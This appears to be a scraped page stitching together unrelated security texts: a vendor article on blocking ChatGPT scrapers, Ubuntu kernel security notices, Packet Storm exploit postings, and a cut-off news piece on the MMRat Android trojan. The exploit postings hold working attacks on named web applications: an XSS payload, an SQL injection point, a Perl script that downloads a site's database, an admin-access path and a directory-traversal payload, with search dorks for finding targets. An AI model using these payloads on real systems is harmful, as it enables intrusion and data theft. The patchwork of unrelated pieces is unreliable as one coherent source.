ChatGPT and similar large language models (LLMs) have added further complexity to the ever-growing online threat landscape. Cybercriminals no longer need advanced coding skills to execute fraud and other damaging attacks against online businesses and customers, thanks to bots-as-a-service, residential proxies, CAPTCHA farms, and other easily accessible tools. 
Now, the latest technology damaging

ChatGPT and similar large language models (LLMs) have added further complexity to the ever-growing online threat landscape. Cybercriminals no longer need advanced coding skills to execute fraud and other damaging attacks against online businesses and customers, thanks to bots-as-a-service, residential proxies, CAPTCHA farms, and other easily accessible tools.

Now, the latest technology damaging businesses' bottom line is ChatGPT.

Not only have ChatGPT, OpenAI, and other LLMs raised ethical issues by training their models on scraped data from across the internet. LLMs are negatively impacting enterprises' web traffic, which can be extremely damaging to business.

****3 Risks Presented by LLMs, ChatGPT, & ChatGPT Plugins****

Among the threats ChatGPT and ChatGPT plugins can pose against online businesses, there are three key risks we will focus on:

1.  **Content theft** (or republishing data without permission from the original source)can hurt the authority, SEO rankings, and perceived value of your original content.
2.  **Reduced traffic** to your website or app becomes problematic, as users getting answers directly through ChatGPT and its plugins no longer need to find or visit your pages.
3.  **Data breaches**, or even the accidental broad distribution of sensitive data, are becoming more likely by the second. Not all "public-facing" data is intended to be redistributed or shared outside of the original context, but scrapers do not know the difference. The results can include anything from a loss in competitive advantage to severe damages to your brand reputation.

Depending on your business model, your company should consider ways to opt out of having your data used to train LLMs.

****3 Most Impacted Industries****

The most at-risk industries for ChatGPT-driven damage are those in which data privacy is a top concern, unique content and intellectual property are key differentiators, and ads, eyes, and unique visitors are an important source of revenue. These industries include:

1.  **E-Commerce**: Product descriptions and pricing models can be key differentiators.
2.  **Streaming, Media, & Publishing:** All about providing the audience with unique, creative, and entertaining content.
3.  **Classified Ads**: Pay per click (PPC) advertising revenue can be severely impacted by a decrease in website traffic (as well as other bot issues like click fraud or skewed site analytics due to scrapers).

UPCOMING WEBINAR

Guard Your Brand: Defending Against ChatGPT's Content Scraping

Worried about ChatGPT scraping your content? Learn how to outsmart AI bots, defend your content, and secure your web traffic.

Join the Session

****How ChatGPT Gets Training Data****

According to a research paper published by OpenAI, ChatGPT3 was trained on several datasets:

*   Common Crawl
*   WebText2
*   Books1 and Books2
*   Wikipedia

The largest amount of training data comes from **Common Crawl**, which provides access to web information through an open repository of web crawl data. The Common Crawl crawler bot, also known as **CCBot**, leverages Apache Nutch to enable developers to build large-scale scrapers.

The most current version of CCBot crawls from Amazon AWS and identifies itself with a user agent of 'CCBot/2.0'. But businesses who want to allow CCBot should not rely solely on the user agent to identify it, because many bad bots spoof their user agents to disguise themselves as good bots and avoid being blocked.

To allow CCBot on your website, use attributes such as IP ranges or reverse DNS. To **block** **ChatGPT**, your website should, at minimum, block traffic from CCBot.

****3 Ways to Block CCBot****

1.  **Robots.txt:** Since CCBot respects robots.txt files, you can block it with the following lines of code:

> User-agent: CCBot  
> Disallow: /

3.  **Blocking CCBot User Agent:** You can safely block an unwanted bot through user agent. (Not that, in contrast, _allowing_ bot traffic through user agent can be unsafe, easily abused by attackers.)
4.  **Bot Management Software:** Whether it's for ChatGPT or a dark web database, the best way to prevent bots from scraping your websites, apps, and APIs is with specialized bot protection that uses machine learning to keep up with evolving threat tactics in real time.

****Scrapers Can Always Find Workarounds****

LLMs use **scraper bots** to gather training data. While blocking CCBot might be effective for blocking ChatGPT scrapers today, there is no telling what the future holds for LLM scrapers. Moving forward, if too many websites block OpenAI (for example) from accessing their content, the developers could decide to stop respecting robots.txt and could stop declaring their crawler identity in the user agent.

Another possibility is OpenAI could use its partnership with Microsoft to access Microsoft Bing's scraper data, making the situation more challenging for website owners. Bing's bots identify as Bingbot, but blocking them could cause problems by preventing your site from being indexed on the Bing search engine, resulting in fewer human visitors.

You could face similar issues by blocking Google's LLM Bard (competitor to ChatGPT). Google is vague about the origin and collection of the public data used to train Bard, but it is possible that Bard is, or will be, trained with data collected by Googlebot scrapers. Like with Bingbot, blocking Googlebot would likely be unwise, impacting how your website gets indexed and how the Google search engine drives traffic to your site. The result could mean a serious drop in visitors.

****Using Plugins to Access Live Data****

One of the main limits of models like ChatGPT is the lack of access to live data. Since it was trained on a dataset that stops in 2021, it is unable to provide the most relevant, up-to-date information. That's where plugins come in.

**Plugins** are used to connect LLMs like ChatGPT to external tools and allow the LLMs to access external data available online, which can include private data and real-time news. Plugins also let users complete actions online (e.g. booking a flight or ordering groceries) through API calls.

Some businesses are developing their own plugins to provide a new way for users to interact with their content/services via ChatGPT. But, depending on your industry, letting users interact with your website through third-party ChatGPT plugins can mean fewer ads seen by your users, as well as lower traffic to your website.

You may also notice that users are less willing to pay for your premium features once your features can be replicated through third-party ChatGPT plugins. For example, an unofficial web client interacting with your site could offer premium features through their UI.

****How to Identify ChatGPT Plugin Requests****

OpenAI documentation states that requests with a specific user agent HTTP header (with token: "ChatGPT-User") come from ChatGPT plugins. But the documentation does not state that the disclosed user agent is the **only** user agent that can be used by plugins when making HTTP requests.

Therefore, as ChatGPT plugins interact with third-party APIs, the APIs can then do any kind of HTTP requests from their own infrastructure. The diagram below shows what happens when a fictitious "Live Sport Plugin" is used with ChatGPT to get an update about a sporting event.

1.  ChatGPT triggers the Live Sport Plugin, making a request to the API endpoints based on parameters from the user prompt.
2.  The plugin makes an HTTP request to scrape a sports website to get the latest information about the event.
3.  The information is then passed back to the end user through ChatGPT.

A plugin can actually make a request to a sport API without having to scrape the sports website. In fact, when requests are made directly from the server hosting the plugin API, there is no constraint on the user agent.

****How to Block ChatGPT Plugin Requests****

In a process similar to blocking ChatGPT's web scrapers, you can block requests from plugins that declare their presence with the "ChatGPT-User" substring by user agent. But blocking the user agent could also block ChatGPT users with the "browsing" mode activated. And, contrary to what OpenAI documentation might indicate, blocking requests from "ChatGPT-User" does not guarantee that ChatGPT and its plugins can't reach your data under different user agent tokens.

In fact, ChatGPT plugins can make requests directly from the servers hosting their APIs using any user agent, and even using automated (headless) browsers. Detecting plugins that do not declare their identity in the user agent requires advanced bot detection techniques.

****Determining Your Next Steps****

Obtaining high-quality datasets of human-generated content will remain of critical importance to LLMs. In the long term, companies like OpenAI (funded partially by Microsoft) and Google may be tempted to use Bingbots and Googlebots to build datasets to train their LLMs. That would make it more difficult for websites to simply opt out of having their data collected, since most online businesses rely heavily on Bing and Google to index their content and drive traffic to their site.

Websites with valuable data will either want to look for ways to monetize the use of their data or opt out of AI model training to avoid losing web traffic and ad revenue to ChatGPT and its plugins. If you wish to opt out, you'll need advanced bot detection techniques, such as fingerprinting, proxy detection, and behavioral analysis, to stop bots before they can access your data.

Advanced solutions for bot and fraud protection leverage AI and machine learning (ML) to detect and stop unfamiliar bots from the first request, keeping your content safe from LLM scrapers, unknown plugins, and other rapidly evolving AI technologies.

**Note:** _This article is expertly written and contributed by Antoine Vastel, PhD, Head of Research at DataDome._

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

How to Prevent ChatGPT From Stealing Your Content & Traffic

Use after free in MediaStream in Google Chrome prior to 116.0.5845.140 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

**Chrome Releases**

Release updates from the Chrome team

CVE-2023-4572: Stable Channel Update for Desktop

Ubuntu Security Notice 6312-1 - It was discovered that the netlink implementation in the Linux kernel did not properly validate policies when parsing attributes in some situations. An attacker could use this to cause a denial of service. Billy Jheng Bing Jhong discovered that the CIFS network file system implementation in the Linux kernel did not properly validate arguments to ioctl in some situations. A local attacker could possibly use this to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6312-1  
August 28, 2023

linux-gke, linux-ibm-5.4 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-gke: Linux kernel for Google Container Engine (GKE) systems  
- linux-ibm-5.4: Linux kernel for IBM cloud systems

Details:

It was discovered that the netlink implementation in the Linux kernel did  
not properly validate policies when parsing attributes in some situations.  
An attacker could use this to cause a denial of service (infinite  
recursion). (CVE-2020-36691)

Billy Jheng Bing Jhong discovered that the CIFS network file system  
implementation in the Linux kernel did not properly validate arguments to  
ioctl() in some situations. A local attacker could possibly use this to  
cause a denial of service (system crash). (CVE-2022-0168)

It was discovered that the ext4 file system implementation in the Linux  
kernel contained a use-after-free vulnerability. An attacker could use this  
to construct a malicious ext4 file system image that, when mounted, could  
cause a denial of service (system crash). (CVE-2022-1184)

It was discovered that some AMD x86-64 processors with SMT enabled could  
speculatively execute instructions using a return address from a sibling  
thread. A local attacker could possibly use this to expose sensitive  
information. (CVE-2022-27672)

William Zhao discovered that the Traffic Control (TC) subsystem in the  
Linux kernel did not properly handle network packet retransmission in  
certain situations. A local attacker could use this to cause a denial of  
service (kernel deadlock). (CVE-2022-4269)

It was discovered that a race condition existed in the qdisc implementation  
in the Linux kernel, leading to a use-after-free vulnerability. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2023-0590)

It was discovered that a race condition existed in the btrfs file system  
implementation in the Linux kernel, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly expose sensitive information. (CVE-2023-1611)

It was discovered that the APM X-Gene SoC hardware monitoring driver in the  
Linux kernel contained a race condition, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or expose sensitive information (kernel memory).  
(CVE-2023-1855)

It was discovered that the ST NCI NFC driver did not properly handle device  
removal events. A physically proximate attacker could use this to cause a  
denial of service (system crash). (CVE-2023-1990)

It was discovered that the XFS file system implementation in the Linux  
kernel did not properly perform metadata validation when mounting certain  
images. An attacker could use this to specially craft a file system image  
that, when mounted, could cause a denial of service (system crash).  
(CVE-2023-2124)

It was discovered that the SLIMpro I2C device driver in the Linux kernel  
did not properly validate user-supplied data in some situations, leading to  
an out-of-bounds write vulnerability. A privileged attacker could use this  
to cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2023-2194)

It was discovered that a race condition existed in the TLS subsystem in the  
Linux kernel, leading to a use-after-free or a null pointer dereference  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-28466)

It was discovered that the DA9150 charger driver in the Linux kernel did  
not properly handle device removal, leading to a user-after free  
vulnerability. A physically proximate attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-30772)

It was discovered that the btrfs file system implementation in the Linux  
kernel did not properly handle error conditions in some situations, leading  
to a use-after-free vulnerability. A local attacker could possibly use this  
to cause a denial of service (system crash). (CVE-2023-3111)

It was discovered that the Ricoh R5C592 MemoryStick card reader driver in  
the Linux kernel contained a race condition during module unload, leading  
to a use-after-free vulnerability. A local attacker could use this to cause  
a denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-3141)

It was discovered that the Qualcomm EMAC ethernet driver in the Linux  
kernel did not properly handle device removal, leading to a user-after free  
vulnerability. A physically proximate attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-33203)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   linux-image-5.4.0-1105-gke      5.4.0-1105.112  
   linux-image-gke                 5.4.0.1105.110  
   linux-image-gke-5.4             5.4.0.1105.110

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   linux-image-5.4.0-1054-ibm      5.4.0-1054.59~18.04.1  
   linux-image-ibm                 5.4.0.1054.65

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6312-1  
   CVE-2020-36691, CVE-2022-0168, CVE-2022-1184, CVE-2022-27672,  
   CVE-2022-4269, CVE-2023-0590, CVE-2023-1611, CVE-2023-1855,  
   CVE-2023-1990, CVE-2023-2124, CVE-2023-2194, CVE-2023-28466,  
   CVE-2023-30772, CVE-2023-3111, CVE-2023-3141, CVE-2023-33203

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-gke/5.4.0-1105.112

Ubuntu Security Notice USN-6312-1

Ubuntu Security Notice 6311-1 - William Zhao discovered that the Traffic Control subsystem in the Linux kernel did not properly handle network packet retransmission in certain situations. A local attacker could use this to cause a denial of service. It was discovered that the NTFS file system implementation in the Linux kernel did not properly check buffer indexes in certain situations, leading to an out-of-bounds read vulnerability. A local attacker could possibly use this to expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6311-1  
August 28, 2023

linux-gcp-5.15, linux-gke, linux-gke-5.15, linux-gkeop, linux-gkeop-5.15  
vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-gke: Linux kernel for Google Container Engine (GKE) systems  
- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems  
- linux-gcp-5.15: Linux kernel for Google Cloud Platform (GCP) systems  
- linux-gke-5.15: Linux kernel for Google Container Engine (GKE) systems  
- linux-gkeop-5.15: Linux kernel for Google Container Engine (GKE) systems

Details:

William Zhao discovered that the Traffic Control (TC) subsystem in the  
Linux kernel did not properly handle network packet retransmission in  
certain situations. A local attacker could use this to cause a denial of  
service (kernel deadlock). (CVE-2022-4269)

It was discovered that the NTFS file system implementation in the Linux  
kernel did not properly check buffer indexes in certain situations, leading  
to an out-of-bounds read vulnerability. A local attacker could possibly use  
this to expose sensitive information (kernel memory). (CVE-2022-48502)

Seth Jenkins discovered that the Linux kernel did not properly perform  
address randomization for a per-cpu memory management structure. A local  
attacker could use this to expose sensitive information (kernel memory) or  
in conjunction with another kernel vulnerability. (CVE-2023-0597)

It was discovered that a race condition existed in the btrfs file system  
implementation in the Linux kernel, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly expose sensitive information. (CVE-2023-1611)

It was discovered that the APM X-Gene SoC hardware monitoring driver in the  
Linux kernel contained a race condition, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or expose sensitive information (kernel memory).  
(CVE-2023-1855)

It was discovered that the ST NCI NFC driver did not properly handle device  
removal events. A physically proximate attacker could use this to cause a  
denial of service (system crash). (CVE-2023-1990)

Ruihan Li discovered that the bluetooth subsystem in the Linux kernel did  
not properly perform permissions checks when handling HCI sockets. A  
physically proximate attacker could use this to cause a denial of service  
(bluetooth communication). (CVE-2023-2002)

It was discovered that the XFS file system implementation in the Linux  
kernel did not properly perform metadata validation when mounting certain  
images. An attacker could use this to specially craft a file system image  
that, when mounted, could cause a denial of service (system crash).  
(CVE-2023-2124)

Juan Jose Lopez Jaimez, Meador Inge, Simon Scannell, and Nenad Stojanovski  
discovered that the BPF verifier in the Linux kernel did not properly mark  
registers for precision tracking in certain situations, leading to an out-  
of-bounds access vulnerability. A local attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-2163)

It was discovered that the SLIMpro I2C device driver in the Linux kernel  
did not properly validate user-supplied data in some situations, leading to  
an out-of-bounds write vulnerability. A privileged attacker could use this  
to cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2023-2194)

It was discovered that the perf subsystem in the Linux kernel contained a  
use-after-free vulnerability. A privileged local attacker could possibly  
use this to cause a denial of service (system crash) or possibly execute  
arbitrary code. (CVE-2023-2235)

Zheng Zhang discovered that the device-mapper implementation in the Linux  
kernel did not properly handle locking during table_clear() operations. A  
local attacker could use this to cause a denial of service (kernel  
deadlock). (CVE-2023-2269)

It was discovered that the ARM Mali Display Processor driver implementation  
in the Linux kernel did not properly handle certain error conditions. A  
local attacker could possibly use this to cause a denial of service (system  
crash). (CVE-2023-23004)

It was discovered that a race condition existed in the TLS subsystem in the  
Linux kernel, leading to a use-after-free or a null pointer dereference  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-28466)

It was discovered that the DA9150 charger driver in the Linux kernel did  
not properly handle device removal, leading to a user-after free  
vulnerability. A physically proximate attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-30772)

It was discovered that the Ricoh R5C592 MemoryStick card reader driver in  
the Linux kernel contained a race condition during module unload, leading  
to a use-after-free vulnerability. A local attacker could use this to cause  
a denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-3141)

Quentin Minster discovered that the KSMBD implementation in the Linux  
kernel did not properly validate pointers in some situations, leading to a  
null pointer dereference vulnerability. A remote attacker could use this to  
cause a denial of service (system crash). (CVE-2023-32248)

It was discovered that the kernel->user space relay implementation in the  
Linux kernel did not properly perform certain buffer calculations, leading  
to an out-of-bounds read vulnerability. A local attacker could use this to  
cause a denial of service (system crash) or expose sensitive information  
(kernel memory). (CVE-2023-3268)

It was discovered that the Qualcomm EMAC ethernet driver in the Linux  
kernel did not properly handle device removal, leading to a user-after free  
vulnerability. A physically proximate attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-33203)

It was discovered that the BQ24190 charger driver in the Linux kernel did  
not properly handle device removal, leading to a user-after free  
vulnerability. A physically proximate attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-33288)

It was discovered that the video4linux driver for Philips based TV cards in  
the Linux kernel contained a race condition during device removal, leading  
to a use-after-free vulnerability. A physically proximate attacker could  
use this to cause a denial of service (system crash) or possibly execute  
arbitrary code. (CVE-2023-35823)

It was discovered that the SDMC DM1105 PCI device driver in the Linux  
kernel contained a race condition during device removal, leading to a use-  
after-free vulnerability. A physically proximate attacker could use this to  
cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2023-35824)

It was discovered that the Renesas USB controller driver in the Linux  
kernel contained a race condition during device removal, leading to a use-  
after-free vulnerability. A privileged attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-35828)

It was discovered that the Rockchip Video Decoder IP driver in the Linux  
kernel contained a race condition during device removal, leading to a use-  
after-free vulnerability. A privileged attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-35829)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-5.15.0-1025-gkeop   5.15.0-1025.30  
   linux-image-5.15.0-1039-gke     5.15.0-1039.44  
   linux-image-gke                 5.15.0.1039.38  
   linux-image-gke-5.15            5.15.0.1039.38  
   linux-image-gkeop               5.15.0.1025.24  
   linux-image-gkeop-5.15          5.15.0.1025.24

Ubuntu 20.04 LTS:  
   linux-image-5.15.0-1025-gkeop   5.15.0-1025.30~20.04.1  
   linux-image-5.15.0-1039-gcp     5.15.0-1039.47~20.04.1  
   linux-image-5.15.0-1039-gke     5.15.0-1039.44~20.04.1  
   linux-image-gcp                 5.15.0.1039.47~20.04.1  
   linux-image-gke-5.15            5.15.0.1039.44~20.04.1  
   linux-image-gkeop-5.15          5.15.0.1025.30~20.04.21

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6311-1  
   CVE-2022-4269, CVE-2022-48502, CVE-2023-0597, CVE-2023-1611,  
   CVE-2023-1855, CVE-2023-1990, CVE-2023-2002, CVE-2023-2124,  
   CVE-2023-2163, CVE-2023-2194, CVE-2023-2235, CVE-2023-2269,  
   CVE-2023-23004, CVE-2023-28466, CVE-2023-30772, CVE-2023-3141,  
   CVE-2023-32248, CVE-2023-3268, CVE-2023-33203, CVE-2023-33288,  
   CVE-2023-35823, CVE-2023-35824, CVE-2023-35828, CVE-2023-35829

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-gke/5.15.0-1039.44  
   https://launchpad.net/ubuntu/+source/linux-gkeop/5.15.0-1025.30  
   https://launchpad.net/ubuntu/+source/linux-gcp-5.15/5.15.0-1039.47~20.04.1  
   https://launchpad.net/ubuntu/+source/linux-gke-5.15/5.15.0-1039.44~20.04.1  
   https://launchpad.net/ubuntu/+source/linux-gkeop-5.15/5.15.0-1025.30~20.04.1

Ubuntu Security Notice USN-6311-1

ImgHosting version 1.2 suffers from a cross site scripting vulnerability.

**ImgHosting 1.2 Cross Site Scripting**

Posted Aug 29, 2023

Authored by indoushka

ImgHosting version 1.2 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 3e0de4ff80dc516a1abe50185e5807a1e503d782b2cd24457e01031368191dc0

Download | Favorite | View

**ImgHosting 1.2 Cross Site Scripting**

    ====================================================================================================================================| # Title     : ImgHosting v1.2 XSS Vulnerability                                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://codecanyon.net/user/FoxSash/?ref=FoxSash                                                                   |  | # Dork      : "ImgHosting  Programming by FoxSash"                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : ?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://127.0.0.1/pikhostinom/?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,046)
*   Arbitrary (16,219)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,283)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,348)
*   DoS (23,460)
*   Encryption (2,370)
*   Exploit (52,001)
*   File Inclusion (4,225)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,788)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,694)
*   Local (14,460)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,149)
*   Proof of Concept (2,339)
*   Protocol (3,603)
*   Python (1,535)
*   Remote (30,816)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,891)
*   Shell (3,187)
*   Shellcode (1,215)
*   Sniffer (895)
*   Spoof (2,207)
*   SQL Injection (16,394)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (666)
*   Vulnerability (31,796)
*   Web (9,671)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,973)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,822)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,543)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,777)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,844)
*   UNIX (9,301)
*   UnixWare (186)
*   Windows (6,579)
*   Other

ImgHosting 1.2 Cross Site Scripting

imax CMS version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : imax CMS v1.0 Sql Injection Vulnerability                                                                          || # Author    : indoushka                                                                                                          | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://i-maxinfotech.com                                                                                           |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] http://127.0.0.1/cafesaffronnetau/view_page.php?id={{x.id}} <=====| inject here[+]  Panel :http://127.0.0.1/cafesaffronnetau/wp-admin/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

imax CMS 1.0 SQL Injection

i-Gallery version 3.4 suffers from a database disclosure vulnerability.

====================================================================================================================================  
| # Title     : i-Gallery v3.4 Database Disclosure Exploit                                                                         |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit)                                              |   
| # Vendor    : http://wmscripti.com/asp-scriptler/igallery-image-resim-galerisi-scripti.html                                      |    
====================================================================================================================================

poc :

[-] Download the database: 

    The following Perl exploit will attempt to download the (igallery.mdb ) file  
    The (igallery.mdb) It is the database and contains all the data .

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

#!/usr/bin/perl -w  
#  
# i-Gallery v3.4 Database Disclosure Exploit   
#  
# Author : indoushka  
#  
# Vondor : ToastForums.com

   use LWP::Simple;  
use LWP::UserAgent;

system('cls');  
print ('i-Gallery v3.4 Database Disclosure Exploit');  
system('color a');

if(@ARGV < 2)  
{  
print "[-]How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/ \n";  
print "[+] usage2 : perl $0 localhost / \n";  
}  
($TargetIP, $path, $File,) = @ARGV;

$File="database/igallery.mdb";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/igallery.mdb");

if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/igallery.mdb\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
=======================================================================================================================================

i-Gallery 3.4 Database Disclosure

iBilling CRM version 4.5.0 suffers from add administrator and insecure direct object reference vulnerabilities.

    ====================================================================================================================================| # Title     : iBilling CRM v4.5.0 Add Admin vulnerability                                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/ibilling-crm-accounting-and-billing-software/11021678                                  || # Dork      : "Login - iBilling"                                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] suffers from an insecure direct object reference that allows users to access the administrative interface.[+] choose a target and add "sysfrm/install/profile.php"[+] http://127.0.0.1/wintechsolutionsin/ibilling/sysfrm/install/profile.php[+] http://127.0.0.1/demotryibcom/dashboard/sysfrm/install/profile.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

iBilling CRM 4.5.0 Add Administrator / Insecure Direct Object Reference

Humhub version 1.3.13 suffers from a directory traversal vulnerability.

    ====================================================================================================================================| # Title     : Humhub v1.3.13 Directory traversal Vulnerability                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 67.0(32-bit)                                               | | # Vendor    : https://www.humhub.org/en/download/package/humhub-1.3.13.zip                                                       |  | # Dork      : "Propulsé par HumHub"                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /static/assets/d1081741/fonts/../Gemfile[+] https://127.0.0.1/humhubcom/static/assets/d1081741/fonts/../GemfileGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Humhub 1.3.13 Directory Traversal

By Deeba Ahmed
So far, the potent Android trojan MMRat has remained undetected on VirusTotal.
This is a post from HackRead.com Read the original post: New MMRat Android Trojan Uses Fake App Stores for Bank Fraud

*   **MMRat is a new Android banking trojan targeting Southeast Asian users.**

*   **It is distributed through phishing websites disguised as official app stores.**

*   **It uses a customized Protobuf-based C2 protocol to improve its performance.**

*   **It captures screenshots, controls devices, collects extensive device, personal data.**

*   **Users can protect themselves from MMRat by downloading apps from trusted sources and avoiding suspicious websites.**

Cybersecurity researchers at Trend Micro Mobile Application Reputation Service (MARS) have discovered a stealthy new Android trojan targeting Southeast Asian mobile phone users since late June 2023.

This Android banking trojan, dubbed MMRat due to its distinctive package called com.mm.user, features a long list of capabilities as it can capture screenshots, remotely control victims’ devices, monitor user input, and perform many other tasks apart from bank fraud while staying undetected.

MARS researchers wrote in a blog post published on August 29, 2023, that the malware remained undetected on VirusTotal.

**How is MMRat Distributed?**

Most MMRat samples were downloaded from phishing websites disguised as official app stores in different languages to expand their reach. It is worth noting that researchers couldn’t determine how victims were lured into visiting these fake app stores.

This “potent” malware has been declared a “considerable threat” to mobile phone users. It uses a specially designed, fully customized Protobuf-based C2 protocol, a rare feature in Android banking trojans. This feature improves the malware’s performance while transferring large data volumes.

**Attack Sequence**

